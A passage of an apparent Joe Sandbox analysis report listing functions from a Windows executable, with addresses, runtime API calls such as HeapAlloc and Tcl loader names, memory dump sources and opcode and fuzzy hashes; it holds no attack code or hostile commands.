                                                                                                                                                                                                                                  • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                  • Instruction ID: 0b099c07253b9450cd99cc86397d56a4bbef62ef019b7b493efab67f8f9d6e6f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B41B732908242C7EA25AA15AD50179B3B2FFA57A0FA00139D68E436D1CF7DF442DF61
                                                                                                                                                                                                                                  Function 00007FF72C657F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                                                                                  • Opcode ID: 7026eb3b68f3585a2f5768ea15c5ca7bda34a28a3ae4cdbb6486ed2f903c9d01
                                                                                                                                                                                                                                  • Instruction ID: 0d6c5bf25cbbd315964dbcc9a4990ae0d34bc11159dc6c2776a6e7451cc13498
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7026eb3b68f3585a2f5768ea15c5ca7bda34a28a3ae4cdbb6486ed2f903c9d01
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0021E721B5865246FA52BB226D043BAE652FF59BE4FE84434EF0C07B86DE7DE441CB10
                                                                                                                                                                                                                                  Function 00007FF72C66B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                  • Instruction ID: b3ffcdc2ea8637889cabde6186c1adbce4fd9242ccead691b6bb038f74b24c3b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B313D22A1864285E612BB558C4137CB6A2FFA1BB4FE14239E95D077D2CE7CA4419F21
                                                                                                                                                                                                                                  Function 00007FF72C669961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                                                                                  • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                  • Instruction ID: b006f94b5d6774d63f00850fd151fd3e9a064759f2957e571430838450647163
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B218072A04B4589EB1AAF64C8803AC73B1FB54728FA4063ADB5D46BC5DF3CD544CB50
                                                                                                                                                                                                                                  Function 00007FF72C665F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                  • Instruction ID: 5b0f5432e87c91338271815ebe442a583a7df5e68f8bee1df1fb53b5ba528f3c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20118431A1C64281EA62BF11980117DF672FFA5BA4FE44439EB4C57A96CF3DE4414F60
                                                                                                                                                                                                                                  Function 00007FF72C676354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                  • Instruction ID: 5c1c71568547bf9acd071346c80e0db66393377e80d0c22d7bd9bb91f2029a27
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D210732618A4286DB22AF18D841379B3A2FBA4B70FA44638E75D476D9DF3CD415CF10
                                                                                                                                                                                                                                  Function 00007FF72C6603BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                  • Instruction ID: 88af2b9d623369b6d1cd895eab9ed39b027310b3992d6538d0e58b66fffe3d1f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97018221A0874180EA16EB529D01079F6A2FFA5FF0FA84679DE5C13BD6CE3CD4118B54
                                                                                                                                                                                                                                  Function 00007FF72C66EB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,00007FF72C66B32A,?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A), ref: 00007FF72C66EBED
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                  • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                  • Instruction ID: af1b5697a959bb7637e601919f99bef49b76924b6adf7a91745dae5e59c700d1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26F04F58B0928240FE5B76B59D552B4E2A2FFA8B60FEC4538C90F462C1DD1CE4804A30
                                                                                                                                                                                                                                  Function 00007FF72C66D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF72C660C90,?,?,?,00007FF72C6622FA,?,?,?,?,?,00007FF72C663AE9), ref: 00007FF72C66D63A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                  • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                  • Instruction ID: 3cdae481fe8222b867514f97429f4788fea26aad7f90dec245290c66738413e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BF0DA50E0924645FE5676725C51675A1A2EFA47B4FA84638DD2E866C2DD2CA4808A30

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00007FF72C6576C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                  • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                  • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                  • Instruction ID: b00a13361c43f882c3d9dc7e2ff6d330094b8b229ca819b7d7d68bea95002607
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E02B324A1DB0B91EA17BB15BC19574A3A3FF647B4BE40831C52E022A4EF3CB14D8A34
                                                                                                                                                                                                                                  Function 00007FF72C65D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                                                                  • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                  • Instruction ID: c0e9453daa5319c9a977e43f5a8ddc277bb9b255e9adbe2c55aa8a73e99b43f6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52313E72609B8186EB619F60EC843EEB361FB94758F44443ADB4E47B99DF38D548CB20
                                                                                                                                                                                                                                  Function 00007FF72C675C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675C45
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C675598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C6755AC
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: RtlFreeHeap.NTDLL(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A95E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: GetLastError.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A968
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72C66A8DF,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66A909
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72C66A8DF,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66A92E
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675C34
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C6755F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C67560C
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675EAA
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675EBB
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675ECC
                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72C67610C), ref: 00007FF72C675EF3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4070488512-0
                                                                                                                                                                                                                                  • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                  • Instruction ID: 7c87c2dfff1801238b98d4aec5a2674972c44497560309c1737eb14a2b8fdfe3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40D1D422A1824286E722FF21DC421B9A363FFA47A4FC48976DA0D47695DF3CE445CF60
                                                                                                                                                                                                                                  Function 00007FF72C66A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                                                                  • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                  • Instruction ID: efd8a26337d1ab9ddb835e402724fb6bf05ce0f95ab9478cfb1275ebdcbd09d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F319336608B8186DB21DF25EC442AEB3A5FB98768F900535EA9D43B99DF3CC159CB10
                                                                                                                                                                                                                                  Function 00007FF72C671874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
